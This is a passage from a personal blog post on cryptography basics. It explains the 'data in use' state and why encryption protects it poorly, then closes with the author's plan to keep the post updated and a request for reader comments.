Data-in-use (processing)

As you might expect, data in use is data that is currently being processed by a CPU or indeed by an end user as it is displayed on a screen. This classification can sometimes seem a little anomalous and its certainly the most difficult of the three to assure ourselves that said data is protected in all the ways that we wish it to be. Its almost a given that in order to be used data must be decrypted and therefore encryption is of minimal protection to data in this state.


Thank you for reading this far in a post which could perhaps have seemed a little bit like the contents page to a book. The analogy is, I hope, a sound one as this post contains some of the most core elements of the cryptographic landscape. I’ve mentioned here and there that I intend to add links from each of the sections of this document to other resources of relevance that I post and hopefully if enough time has passed since right now while Im writing this and you landing here to read it then that will be evidenced above. Check back again in the future and look at the links here or even the categories and tags for the blog as it is my firm intention to make this a living document.

Its a bloggers cliché but I would really appreciate your comments. Good and bad. Im committed to displaying them all here and, do that, I will but whatever the motivation its cool to get involved in dialogue whether here in the blog or on twitter or elsewhere.